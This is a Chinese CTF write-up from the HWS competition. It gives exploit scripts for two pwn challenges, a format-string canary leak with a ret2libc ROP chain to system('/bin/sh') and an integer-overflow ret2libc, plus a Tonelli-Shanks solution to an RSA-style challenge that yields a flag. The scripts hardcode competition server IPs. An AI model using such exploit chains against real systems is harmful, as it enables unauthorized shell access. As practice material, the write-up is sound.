2023.11.18

两天半的比赛,就打了半天(因为要赶去打香山杯决赛了),不过结果还算好,人生第一次拿了两个一血hhh。写wp的时候人在中大南校北门的酒店里:)

controller

格式化字符串泄露canary之后打ret2libc即可。

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30024)

rdi = 0x0000000000402533 # pop rdi ; ret

putsg = gotadd('puts')

puts = pltadd('puts')

sl(b'6')

sl(b'2')

sl(b'2')

sla('fo',b'%13$p')

sl(b'')

sl(b'1')

sl(b'')

ru(b'No.2')

addx = getx(-13,-1)

base = addx - 0x21c87

dpx('libcbase',base)

sl(b'6')

sl(b'2')

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

can = getx(-19,-1)

dpx('can',can)

#需要泄露canary

sl(b'0')

sl(b'0')

sl(b'')

sl(b'9')

sla('ame:',b's'*1)

sh = base+0x00000000001b3d88

sys = pltadd('system')

ret = 0x0000000000400b3e

#sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+p64(0x400d20))

sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+b'aaaaaaaa'+p64(rdi)+p64(sh)+p64(ret)*3+p64(sys))

ia()

inverse

ret2libc和整数溢出

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30007)

tag = 0x804C030

puts = pltadd('puts')

putsg = gotadd('puts')

sa(':',b'/bin/sh')

sl(b'-1')

sla(':',b'a'*(0x3c+4)+p32(puts)+p32(0x80493d5)+p32(putsg))

add = getx64(0,-17)

base = getbase(add,'puts')

pause()

sl(b'-1')

sys = symoff('system',base)

sh = base + 0x0017b9db

sl(b'a'*(0x3c+4)+p32(sys)+p32(0xdeadbeef)+p32(sh)+p32(0xdeadbeaf))

ia()

ezrsa

求模平方根即可。

n = 4124820799737107236308837008524397355107786950414769996181324333556950154206980059406402767327725312238673053581148641438494212320157665395208337575556385

m = 13107939563507459774616204141253747489232063336204173944123263284507604328885680072478669016969428366667381358004059204207134817952620014738665450753147857

def legendre_symbol(a, p):

    # 计算雅可比符号 (a/p)

    if a % p == 0:

        return 0

    elif pow(a, (p - 1) // 2, p) == 1:

        return 1

    else:

        return -1

def mod_sqrt(n, p):

    # Tonelli-Shanks 算法求模平方根

    if legendre_symbol(n, p) != 1:

        raise Exception('No modular square root exists')

    q = p - 1

    s = 0

    while q % 2 == 0:

        q //= 2

        s += 1

    if s == 1:

        return pow(n, (p + 1) // 4, p)

    z = 2

    while legendre_symbol(z, p) != -1:

        z += 1

    c = pow(z, q, p)

    r = pow(n, (q + 1) // 2, p)

    t = pow(n, q, p)

    m = s

    while t != 1:

        i = 1

        while pow(t, 2**i, p) != 1:

            i += 1

        b = pow(c, 2**(m - i - 1), p)

        r = (r * b) % p

        t = (t * b * b) % p

        c = (b * b) % p

        m = i

    return r

def solve_quadratic_congruence(n, m):

    # 解二次同余方程 x^2 ≡ n (mod m)

    if m == 2:

        return [n % 2, (n % 2) ^ 1]  # 对于模2,只有0和1两个解

    solutions = []

    # 判断模平方根是否存在

    if pow(n, (m - 1) // 2, m) != 1:

        raise Exception('No solution exists')

    # 计算模平方根

    sqrt_n = mod_sqrt(n, m)

    # 解方程

    x1 = sqrt_n

    x2 = m - sqrt_n

    solutions.append(x1)

    solutions.append(x2)

    return solutions

# 示例用法

result = solve_quadratic_congruence(n, m)

print(f"Solutions for x^2 ≡ {n} (mod {m}): {result}")

'''

>>> from Crypto.Util.number import *

>>> long_to_bytes(13107939563507459774616204141253747489232063336204173944123263271467599846065153978657975398261302535968199127597145828004727119047657179535038810099310932)

b'\xfaFF"\x0bxn\x93\xd1\xfd8\x91\x8d;g\x8c\xf7Wj\xcf\x8c\xde\x94\x14\xea\xd9\xfdB\xd5\x16\xe4>\xe5\xdf%(\xb29^\x87v\x04\x9eOV\xc9\xd18\xc6o\x08\xb8vL\x16N\xb6\xede\xf9\x13\x90aT'

>>> long_to_bytes(13040004482820526093820693618708125830699182230406913376202407698904962835203626640653836925)

b'flag{9971e255f0c020e8e57fbae75f43d7fb}'

'''

HWS山大专区PWN双一血 & CRYPTO-WP的更多相关文章

  1. [复现]2021 DASCTF X BUUOJ 五月大联动-PWN

    [复现]2021 DASCTF X BUUOJ 五月大联动 由于我没ubuntu16就不复现第一个题了,直接第二个 正常的off by one from pwn import * context.os ...

  2. 腾讯云开放云压测“黑科技“,产品上线从此不再“压力山大"

    商业转载请联系腾讯WeTest获得授权,非商业转载请注明出处. 能否解决"高并发"问题一直是检验一个产品后台是否稳定,架构是否合理,性能是否强大的核心标准.对于产品而言,多高的并发 ...

  3. bugku crypto wp上半部分汇总

    1.滴答~滴 摩斯码,在线解开. 2. 栅栏密码,在线解就出flag了. 3. Ook解密,由.?!Ook组成密文,在线网站解密 4.这不是摩斯密码 有点像jsfuck,发现又不是,因为不会出现大于号 ...

  4. 双11遇上ZBrushCore,如此优惠还等什么!

    对不起!让大家久等了,ZBrush简体中文版ZBrushCore这次是真的来了,恰逢双11,老板说了,钱不是问题,你们开心就好,特别是热爱3D的单身狗们!你们那么热爱这个行业,1099元/套终身授权使 ...

  5. 微信事业群WXG成立 致力于打造微信大平台

    今天,微信之父张小龙带领微信团队成立微信事业群(WeiXin Group,简称WXG),致力于打造微信大平台,由他们负责微信基础平台.微信开放平台.微信支付拓展.O2O等微信延伸业务的发展,并包括邮箱 ...

  6. "浪潮杯"第六届ACM山东省省赛山科场总结

    从空间拷过来的.尽管已经过去一个月了.记忆犹新 也算是又一次拾起这个blog Just begin 看着一群群大牛还有队友男神的省赛总结都出了 我最终也耐不住寂寞 来做个流水账抒抒情好了 第一次省赛 ...

  7. 分布式系统中我们会对一些数据量大的业务进行分拆,分布式系统中唯一主键ID的生成问题

    分布式全局唯一ID生成策略​ https://www.cnblogs.com/vandusty/p/11462585.html 一.背景 分布式系统中我们会对一些数据量大的业务进行分拆,如:用户表,订 ...

  8. 2021羊城杯比赛复现(Crypto)

    bigrsa 题目: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474 ...

  9. 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    Polar码被采纳为5G eMBB场景的控制信道编码,这两天连续被这条消息刷屏,连吃瓜群众都直呼好爽. 然而,随着媒体报道的持续发酵,真相在口口相传中变了形,不乏夸大不实之嫌,小编终于坐不住了,也想吐 ...

  10. [转][业界动态] 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    本文转自:http://xinsheng.huawei.com/cn/index.php?app=forum&mod=Detail&act=index&id=3264791 P ...

随机推荐

  1. excel如何自动获取本周工作日的日期显示作为标题(周一至周五)

    一.背景: 每周发周报的标题格式为:本周一到本周五的日期内容,如下:但是每隔一周发送的时候需要改一下周报标题里面的日期,比较麻烦目前的需求是通过函数自动化生成,根据当前的日期去定位出本周一的日期以及本 ...

  2. Liunx常用操作(七)-文件上传下载方法

    如下介绍了几个比较方便的liunx软件的文件维护方法 一.SZ,RZ liunx服务器上安装 通过apt来安装z.sz:安装后直接上传下载文件 apt-get install lrzsz 用法: # ...

  3. 每天学五分钟 Liunx 0101 | 服务篇:创建进程

    创建子进程 上一节说过创建子进程的三种方式: 1. fork 复制进程:fork 会复制当前进程的副本,产生一个新的子进程,父子进程是完全独立的两个进程,他们掌握的资源(环境变量和普通变量)是一样的. ...

  4. Linux-定时任务-cron

  5. Grafana监控Oracle数据库的表大小等信息

    Grafana监控Oracle数据库的表大小等信息 方案 oracledb_exporter 以及 prometheus grafana 使用的SQL以及配置文件 [[metric]] context ...

  6. [转帖]rclone将本地文件或文件夹导入minio中

    1.背景:公司数据迁移涉及到文件迁移,原有文件服务器没有使用minio,但是现在的新系统使用了minio.所以这就需要我们将文件上传到minio文件服务器中:由于历史文件数据量大,甲方要求可以通过服务 ...

  7. MySQL数据库存储varchar时多大长度会出现行迁移?

    最近客户现场有人问过mysql数据库的一些参数配置的问题, 这边数据库需要将strict 严格模式关掉, 目的是为了保证数据库在插入字段时不会出现8126的长度限制错误问题. 但是一直很困惑, mys ...

  8. VScode中下载了插件但是无法找到SSH Target连接服务器的解决方法(CANNOT find SSH Target in remote explorer)

    VSCode版本vscode version:(version 1.82) 已下载扩展installed extensions: Remote - SSH v0.106.4 Remote - SSH: ...

  9. vue3父组件方法之间方法的互相调用

    场景描述 在项目开发中.我们可能会使用父组件调用子组件中的方法 也有可能子组件中调用父组件中的方法 下面我们来看一看组件之间方法的调用 父组件页面 <template> <div&g ...

  10. vue在render函数中如何实现v-model和事件绑定(4)

    1.h函数的三个参数 第一个参数是必须的. 类型:{String | Object | Function} 一个 HTML 标签名.一个组件.一个异步组件.或一个函数式组件. 是要渲染的html标签. ...